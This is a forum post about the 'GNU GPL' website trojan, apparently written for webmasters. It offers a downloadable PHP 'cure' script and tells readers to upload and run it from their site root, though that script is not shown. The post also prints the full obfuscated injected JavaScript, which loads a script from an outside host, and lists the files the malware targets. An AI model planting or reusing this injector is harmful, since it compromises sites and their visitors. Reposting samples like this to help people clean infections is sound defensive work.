Thread: <script>/*GNU GPL*/ try{window.onload = function(){var

THIS POST CONCERNS THE " <script>/*GNU GPL*/ try{window.onload = function(){var " VIRUS - HOW TO FIX IT! - most popular website attack trojan, infcting many websites ...

HERE IS HOW TO FIX IT IN 4 EASY STEPS

1) Download this file: Cure GNU GPL Virus File (Curevir.php) - curevir..zip
2) Extract the file contained in it, its called: curevir.php
3) Upload that file to the ROOT DIRECTORY of your website
4) Go to: [url]http://YOURWEBSITENAME.COM/curevir.php[/url]


Thats it, it will take a seconds to a few minutes depending on how large your website is, it scans every file that could be infected, backs it up first, then removes the virus if it finds it.
Once its done its thing, and you are happy that the virus is gone, then you can delete your backups.

IMPORTANT - you must now change all your ftp passwords, they have been compromised, and your website will be re-infected unless you do this immediately.


If you find this tool useful, PLEASE link to us!

EXAMPLE OF THE FULL CODE:
[CODE]<script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.se tAttribute('type', 'text/javascript');X08yhffhg7xkxf.setAttribute('id',
'myscript1');X08yhffhg7xkxf.setAttribute('src', 'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)n&-
$@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(! c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-
)$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n &))^(.!#r^$^u!!)^!8&#0$8^!!0#@$/@^#n^$o#&!v@!!
i@#@n)k))y!(#.@$c&#(^#z)@#/###^n^!o!(^(v)))$#i)!&)n@^)k!y^)^.^(c(!@z!!^/#!)c&@#d)i&^s$$(c$^o&(u@!
n$)&t(!.@$!c&$)o$m!&$/$@$w&o)#r)##d(!$!@p)!r@@$e)$s&#s($.@&&c&)))o@&m@(/&#^g^^@(o@o^!g!)l^!e#^
#^.)&!c$!o$#&&&m^$#/^(@&'.replace(/\$|&|\!|\)|@|#|\(|\^/ig, ''));X08yhffhg7xkxf.setAttribute('defer',
'defer');document.body.appendChild(X08yhffhg7xkxf) ;}} catch(e) {}</script>
[/CODE]

It attacks any webpage that it finds on your server that meet the following criteria:

filename =
index*
default*
*.js